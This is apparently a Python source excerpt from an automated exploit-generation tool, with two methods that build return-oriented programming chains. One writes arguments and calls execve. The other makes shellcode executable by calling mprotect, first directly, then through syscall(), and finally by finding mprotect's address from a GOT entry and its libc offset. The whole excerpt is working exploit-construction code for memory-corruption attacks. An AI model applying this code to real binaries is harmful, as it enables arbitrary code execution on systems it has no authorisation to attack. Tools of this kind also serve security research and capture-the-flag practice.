def create_execve_chain(self, goal):
"""This function returns a ROP chain implemented for a ExecveGoal. It first writes the arguments for execve, then calls
execve"""
argument_addresses = []
for arg in goal.arguments:
argument_addresses.append(self.get_writable_memory(len(arg)))
argv_address = self.get_writable_memory(self.alignment)
function_goal = go.FunctionGoal(
goal.name, goal.address, [argument_addresses[0], argv_address, 0])
function_chain, next_address = self.create_function_chain(
function_goal, 0x4444444444444444)
chain = ""
for i in range(len(argument_addresses)):
packed_args_address = utils.ap(argument_addresses[i], self.arch)
argv_chain, next_address = self.create_write_memory_chain(
packed_args_address, argv_address, next_address, "\x00")
argv_address += len(packed_args_address)
chain = argv_chain + chain
null_chain, next_address = self.create_write_memory_chain(
"\x00", argv_address, next_address, "\x00")
chain = null_chain + chain
for i in range(len(goal.arguments)):
arg_chain, next_address = self.create_write_memory_chain(
goal.arguments[i], argument_addresses[i], next_address, "\x00")
chain = arg_chain + chain
return (chain + function_chain), next_address
def create_shellcode_address_chain(self, goal):
"""This method returns a ROP chain for a ShellcodeAddressGoal. The ROP will fix the memory permissions and then jump to the
shellcode's address."""
# Look for the address of functions capable of fixing the memory protections
addresses = self.file_handler.get_symbols_address(["mprotect", "syscall"])
if addresses["mprotect"] != None:
# If we've have mprotect, we're on easy street. Create a chain to call mprotect()
self.logger.info("Found mprotect, using to change shellcode permissions")
mprotect_goal = go.FunctionGoal("mprotect", addresses["mprotect"], [goal.shellcode_address & PAGE_MASK, 0x1000, PROT_RWX])
return self.create_function_chain(mprotect_goal, goal.shellcode_address)
elif addresses["syscall"] != None:
# If we've have the syscall function, slightly harder as it needs an extra argument. Create a chain to call syscall()
self.logger.info("Found syscall(), using it to call mprotect to change shellcode permissions")
syscall_goal = go.FunctionGoal("syscall", addresses["syscall"], [extra_archinfo.MPROTECT_SYSCALL[self.arch.name],
goal.shellcode_address & PAGE_MASK, 0x1000, PROT_RWX])
return self.create_function_chain(syscall_goal, goal.shellcode_address)
# TODO add mmap/memcpy, mmap + rop memory writing, using syscalls instead of functions, and others ways to fix the memory protections
# We failed using the easy techniques for fixing memory, so now try to read the GOT address for a used function and then add
# the offset in libc to find mprotect. This will allow us to call mprotect without knowing the address of libc
self.logger.info("Couldn't find mprotect or syscall, resorting to reading the GOT and computing addresses")
functions_in_got = ["printf", "strlen", "puts", "read", "open", "close", "exit"] # Keep trying, in case they don't use the first function
base_address_in_got = offset_in_libc = None
for base in functions_in_got:
# Find the address of the base function in libc, and the offset between it and mprotect
base_address_in_got, offset_in_libc = self.file_handler.resolve_symbol_from_got(base, "mprotect")
if base_address_in_got != None and offset_in_libc != None:
self.logger.info("Using %s to find the address of libc: 0x%x", base, base_address_in_got)
break
if base_address_in_got != None and offset_in_libc != None:
# Create the chain to call mprotect based on the base function's address
mprotect_args = [goal.shellcode_address & PAGE_MASK, 0x2000, PROT_RWX]
chain, next_address = self.create_read_add_jmp_function_chain(base_address_in_got, offset_in_libc, mprotect_args, goal.shellcode_address)
if chain != None:
return chain, next_address
raise RuntimeError("Failed finding necessary gadgets for shellcode address goal")